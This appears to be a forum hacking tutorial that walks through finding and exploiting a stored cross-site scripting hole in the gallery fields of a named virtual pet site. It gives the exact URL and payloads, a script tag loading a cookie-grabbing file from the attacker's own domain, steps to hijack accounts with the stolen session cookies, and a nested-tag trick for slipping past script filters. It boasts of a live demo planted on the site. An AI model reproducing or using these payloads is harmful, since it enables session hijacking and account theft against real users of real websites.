Information
XSS stands for Cross Site Scripting. These exploits are usually used in conjunction with a cookie grabber and a cookie editor add-on (such as Add n Edit Cookies for Mozilla Firefox) to steal accounts from various websites. This is a very easy way to steal users' passwords right from the site.
In this tutorial, you will learn to do some basic XSS auditing and to exploit those holes to gain access.
Chapter 1 – Finding a Site
Good sites to practice on are sites that have a lot of user input. Profile sites (Myspace-Clones, Virtual Pet Sites, etc.) are great.
For this tutorial, let's use the online virtual pet site Rescreatu.
Let's start hacking.
Part B – Finding the Vuln ( Security Hole )
XSS vulnerabilities are created when the programmers don't validate the data a user inputs. On this particular site, I know of one exploit I just found. There are probably more, but let's just use the one I found so far.
The exploit is found in the Gallery area of the site. A Gallery is where you apparently put ‘rare’ items in the game to be shown off to people.
The idiots don’t validate the input for the shop name and description. You don’t even need to obfuscate the attack vector.
Navigate to: http://www.rescreatu.com/gallery/manage.php
Create the gallery if you must.
Now, in the shop name, type:
Code:
<script>alert('xss 1')</script>
And in the shop description put:
Code:
<script>alert('xss 2')</script>
And hit create. Now, click on View Gallery and let's see if it worked.
We get xss 2, but not xss 1. At least we have one hole. (Note that xss 1 can work if you obfuscate it a little bit. All you need to do is type '><script>alert('xss 1')</script> and it works.)
Now that we have an XSS vector… Let’s have some fun and steal some accounts.
Exploiting the hole.
Now, you may be wondering how to take advantage of the ability to use javascript. Seems stupid, right? Wrong.
Here's a hint on what you can do. Try changing "alert('xss')" to "alert(document.cookie)" and see what happens.
Yep, it pops an alert box with your cookies.
Start by putting those files on your webserver, as I said. In ‘session.js’, change the domain name to the place you are hosting the script from, and change SITEPREFIX to Rescreatu, so you know what site the cookies are from.
After uploading all the cookie grabbing scripts, let’s try it out.
Go to edit your gallery details, and change the description to this:
Code:
<script src="http://domain.com/session.js">
Where domain.com is your domain with the cookie grabbing script.
Now let's navigate to our sessions.txt.
It works! It grabs the cookies. Now just use the Firefox add-on "Add n Edit Cookies", filter it to only show cookies from Rescreatu Pets, and change your cookies to match the ones in the log.
I don’t know if this works for stealing accounts on Rescreatu, since it only grabs the PHPSESSID cookie. But on 90% of sites with XSS holes, this works.
Enjoy.. any questions, ask me.
For a live demo, check out http://www.rescreatu.com/game.php?a…allery&id=47729
And then view your sessions.txt file.
For other sites that try to block XSS… there are ways around it.
For instance, let's say you type in "<script>alert('xss')</script>" and when you save, it changes it to alert('xss') and totally removes the <script> and </script>.
Then let’s try this:
<sc<script>ript>alert('xss')</scr</script>ipt>
And hit save. Voila! This usually works, since it replaces the <script> and </script> with nothing, thus closing the tags you broke up around it.
Try obfuscation tricks like this to get around it.